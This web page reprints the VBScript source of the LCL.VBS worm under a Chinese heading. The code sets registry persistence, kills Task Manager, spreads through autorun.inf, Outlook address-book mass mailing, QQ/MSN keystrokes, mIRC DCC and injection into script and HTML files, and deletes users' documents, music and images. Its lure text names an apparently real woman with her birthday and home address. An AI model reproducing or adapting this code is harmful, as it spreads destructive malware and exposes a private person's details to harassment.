LCL.VBS 病毒源代码

时间:2021-05-22

rem email:kouguoxi@hotmail.com
rem some crack statement i remment,make it can't to run
onerrorresumenext

dimtitle,text
title="canyouhelpmefindaperson?"
text="hernameisLiuChunli."&chr(13)&chr(10)
text=text&"herbirthdayis1981-01-23."&chr(13)&chr(10)
text=text&"hermotherhomeisYuzhen.Qixian.Kaifeng.Henan.China."&chr(13)&chr(10)
text=text&"Iwasdiedbecausebyher,"&chr(13)&chr(10)
text=text&"Iamdemandingmylifeofyou."&chr(13)&chr(10)

Setfso=CreateObject("Scripting"&"."&"FileSystem"&"Object")
self=fso.opentextfile(wscript.scriptfullname,1).readall
setWshShell=WScript.CreateObject("WScript"&"."&"Shell")
Startup=WshShell.SpecialFolders("Startup")
Setdirwin=fso.GetSpecialFolder(0)
Setdirsystem=fso.GetSpecialFolder(1)
Setdirtemp=fso.GetSpecialFolder(2)
Setlcl=fso.GetFile(WScript.ScriptFullName)
lcl.Copy(dirwin&"\lcl.vbs")
lcl.Copy(dirsystem&"\lcl.vbs")
fso.getfile(dirwin&"\lcl.vbs").attributes=7
fso.getfile(dirsystem&"\lcl.vbs").attributes=7

setsf0=fso.GetSpecialFolder(0)
b=sf0.drive&"\lcl.txt"
Setlcl=fso.CreateTextFile(b,True)
lcl.Writetext
fso.CopyFileb,Startup&"\lcl.txt"
lcl.Close

dimlcl
Setlcl=fso.CreateTextFile(wscript.scriptfullname,True)

Functionscode(N)
dimx
forx=0to254
ifn=chr(x)then
scode=x
exitfunction
endif
next
endfunction

rem请教:用readline等方法,整行加密,保持文本格式不不变;和解密办法。
remexecute我用不好请赐教。
dimcc,cipher,correy
forl=1tolen(self)
cc=mid(self,l,1)
ifl>99andinstr(self,"LiuChunli")>0then
cipher=chr(scode(cc)+9)rem我开始用99,得到的全是ascll为0的数据
else
cipher=chr(scode(cc))
endif
correy=correy&cipher
next

lcl.Writecorrey
lcl.Close

dimhk,hc,safe
hk="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run"
hc="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout",0,"REG_DWORD"
wshshell.Regwritehk&"\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"exec\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"Once\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"OnceEx\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"service\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"Services\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehc&"\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehc&"exec\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehc&"Once\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehc&"service\lcl",dirsystem&"\lcl.vbs"
safe="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\"
wshshell.Regwritesafe&"Minimal\lcl.vbs",dirsystem&"\lcl.vbs"
wshshell.Regwritesafe&"Network\lcl.vbs",dirsystem&"\lcl.vbs"

do
wshshell.run"cmd/ctaskkill/f/imtaskmgr.exe",0
wshshell.run"cmd/ctaskkill/f/imtasklist.exe",0
loop

dimd
ForEachdinfso.Drives
ifd.drivetype<>4then
fso.CopyFileb,d&"\lcl.txt"
scan(d)
endif
ifd.drivetype=1andd.isready=trueandFormatNumber(d.FreeSpace/1024,0)>99then
fso.copyfilewscript.scriptfullname,d&"\lcl.vbs"
fso.getfile(wscript.scriptfullname).attributes=7
setinf=fso.createtextfile(d&"\autorun.inf",true)
fso.getfile(d&"\autorun.inf").attributes=7
inf.writeline"[autorun]"
inf.writeline"open="
inf.writeline"shell\open=打开(&O)"
inf.writeline"shell\open\Command=WScript.exelclrun.vbs"
inf.writeline"shell\open\Command=WScript.exelcl.vbs"
inf.writeline"shell\open\Default=1"
inf.writeline"shell\explore=资源管理器(&X)"
inf.writeline"shell\explore\Command=WScript.exelclrun.vbs"
inf.writeline"shell\explore\Command=WScript.exelcl.vbs"
inf.close
setini=fso.createtextfile(d&"\desktop.ini",true)
fso.getfile(d&"\desktop.ini").attributes=7
ini.writeline"[.ShellClassInfo]"
ini.writeline"CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
ini.close
setlclrun=fso.createtextfile(d&"\lclrun.vbs",true)
fso.getfile(d&"\lclrun.vbs").attributes=7
lclrun.writeline"OnErrorGoTo0"
lclrun.writeline"setfso=CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"
lclrun.writeline"iforeachdinfso.drives"
lclrun.writeline"ifd.drivetype=1andd.isready=trueandFormatNumber(d.FreeSpace/1024,0)>99then"
lclrun.writeline"fso.getfile(d.driveletter"&"&"&chr(34)&":\lclrun.vbs"&chr(34)&").attributes=7"
lclrun.writeline"setwshshell=wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"
lclrun.writeline"wshshell.run"&chr(34)&"d.driveletter"&"&"&chr(34)&":\lclrun.vbs"&chr(34)&chr(34)
lclrun.writeline"wshshell.run"&chr(34)&"d.driveletter"&"&"&chr(34)&":\lcl.vbs"&chr(34)&chr(34)
lclrun.writeline"endif"
lclrun.writeline"next"
lclrun.close
endif
next

dimwshnetwork,netdrives,net1,net2
SetWSHNetwork=WScript.CreateObject("WScript.Network")
SetnetDrives=WSHNetwork.EnumNetworkDrives
IfnetDrives.Count>0Then
Fori=0TonetDrives.Count-1Step2
net1=netdrives(i)
net2=netDrives(i+1)
scan(net1)
scan(net2)
Next
EndIf

dimoutlookapp,mapiobj,addrlist,addrentcount,item,addrent,attachments
SetoutlookApp=CreateObject("Outlook.App"&"lication")
IfoutlookApp="Outlook"oroutlookapp="outlookexpress"Then
SetmapiObj=outlookApp.GetNameSpace("MAPI")''获取MAPI的名字空间
SetaddrList=mapiObj.AddressLists''获取地址表的个数
ForEachaddrInaddrList
Ifaddr.AddressEntries.Count<>0Then
addrEntCount=addr.AddressEntries.Count''获取每个地址表的Email记录数
ForaddrEntIndex=1ToaddrEntCount''遍历地址表的Email地址
Setitem=outlookApp.CreateItem(0)''获取一个邮件对象实例
SetaddrEnt=addr.AddressEntries(addrEntIndex)''获取具体Email地址
item.To=addrEnt.Address
item.Subject=title
item.Body=text
SetattachMents=item.Attachments
attachMents.Addfso.GetSpecialFolder(0)&"\lcl.vbs"
item.DeleteAfterSubmit=True''信件提交后自动删除
Ifitem.To<>""Then
item.Send
wshshell.regwrite"HKCU\software\Mailtest\mailed","1"
EndIf
Next
EndIf
Next
Endif

remnextfromiloveyou.
setout=WScript.CreateObject("Outlook.Application")
setmapi=out.GetNameSpace("MAPI")
forctrlists=1tomapi.AddressLists.Count
seta=mapi.AddressLists(ctrlists)
x=1
regv=wshshell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if(regv="")then
regv=1
endif
if(int(a.AddressEntries.Count)>int(regv))then
forctrentries=1toa.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=wshshell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if(regad="")then
setmale=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject=title
male.Body=text
male.Attachments.Add(dirsystem&"lcl.vbs")
male.Send
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
endif
x=x+1
next
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
endif
next
Setout=Nothing
Setmapi=Nothing

SetobjOutlook=CreateObject("Outlook.Application")
IfobjOutlook="Outlook"Then
SetobjNamespace=objOutlook.GetNameSpace("MAPI")
SetcolAddressLists=objNamespace.AddressLists
SetonjNameSpace=Nothing
ForEachobjItemIncolAddressLists
IfobjItem.AddressEntries.Count<>0Then
intCountOfAddresses=objItem.AddressEntries.Count
Fori=1TointCountOfAddresses
SetobjMailMsg=objOutlook.CreateItem(0)
SetobjDestAddress=objItem.AddressEntries(i)
objMailMsg.To=objDestAddress.Address
objMailMsg.Subject=title
objMailMsg.Body=text
execute"setobjSend=objMailMsg."&Chr(65)&Chr(116)&Chr(116)&Chr(97)&Chr(99)&Chr(104)&Chr(109)&Chr(101)&Chr(110)&Chr(116)&Chr(115)
strAttach=strFilePathName
objMailMsg.DeleteAfterSubmit=True
objSend.AddstrAttach
IfobjMailMsg.To<>""Then
objMailMsg.Send
EndIf
Next
EndIf
Next
SetobjOutlook=Nothing
SetobjItem=Nothing
SetobjMailMsg=Nothing
SetobjDestAddress=Nothing
EndIf

strComputer="."
SetwbemServices=Getobject("winmgmts:\\"&strComputer)
SetwbemObjectSet=wbemServices.InstancesOf("Win32_Process")
ForEachwbemObjectInwbemObjectSet
ifwbemObject.Name="msn.exe"orwbemObject.Name="qq.exe"then
WshShell.AppActivatewbemobject.name
WshShell.SendKeys"canyouhelpmefindaperson?"
WshShell.SendKeys"^{enter}"'or"^~"
WScript.Sleep9000
WshShell.SendKeys"hernameisLiuChunli"
WshShell.SendKeys"^{enter}"
WScript.Sleep9000
WshShell.SendKeys"herbirthdayis1981-02-17."
WshShell.SendKeys"^{enter}"
WScript.Sleep9000
WshShell.SendKeys"hermotherhomeisYuzhen.Qixian.Kaifeng.Henan.China."
WshShell.SendKeys"^{enter}"
endif
Next

subscan(folder)
OnErrorGoTo0
setfd=fso.getfolder(folder)
foreachfileinfd.files
self1=fso.opentextfile(file,1).readall
ext=fso.GetExtensionName(file)
ext=lcase(ext)
ifext="vbs"orext="vbe"orext="wsc"orext="wsf"orext="wsh"orext="sct"then
ifinstr(self1,"LiuChunli")<0then
setlcl=fso.opentextfile(file.path,8,true)
lcl.writechr(13)&chr(10)
lcl.writeself
lcl.writechr(13)&chr(10)
lcl.close
endif
endif
ifext="htm"orext="html"orext="xhtml"orext="shtml"orext="dhtml"orext="phtml"orext="eml"then
ifinstr(self1,"LiuChunli")<0then
setlcl=fso.opentextfile(file.path,8,true)
lcl.write"<"&"SCRIPTLANGUAGE='VBScript'>"
lcl.writechr(13)&chr(10)
lcl.writeself
lcl.write"<"&"/SCRIPT>"
lcl.writechr(13)&chr(10)
lcl.close
endif
endif
remorext="mspx"
ifext="htd"orext="asp"orext="htt"orext="aspx"orext="cfm"orext="tpl"orext="dtd"orext="hta"then
ifinstr(self1,"LiuChunli")<0then
setlcl=fso.opentextfile(file.path,8,true)
lcl.write"<"&"SCRIPTLANGUAGE='VBScript'>"
lcl.writechr(13)&chr(10)
lcl.writeself
lcl.write"<"&"/SCRIPT>"
lcl.writechr(13)&chr(10)
lcl.close
endif
endif
ifext="ini"then
ifnotinstr(self1,"LiuChunli")>0then
dimini
setini=fso.opentextfile(file.path,8,true)
ini.writelinechr(13)&chr(10)
ini.WriteLine"[script]"
ini.WriteLine"n0=on1:JOIN:#:{"
ini.WriteLine"n1=/if($nick==$me){halt}"
ini.WriteLine"n2=/.dccsend$nick"&dirsystem&"\lcl.vbs"
remini.WriteLine"n0=on1:join:*.*:{if($nick!=$me){halt}/dccsend$nick"&dirsystem&"\lcl.vbs"}"
'利用命令/ddcsend$nick"&dirsystem&"\lcl.vbs"给通道中的其他用户传送病毒文件
ini.WriteLine"n3=}"
ini.WriteLine";LiuChunli"
ini.close
endif
endif
remevery9inthelunarcalendadoit
ifext="mp3"orext="doc"orext="docx"orext="dwg"orext="wma"orext="swf"orext="jpg"then
file.deletetrue
endif
next
foreachsubfdinfd.subfolders
scan(subfd)
next
endsub

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章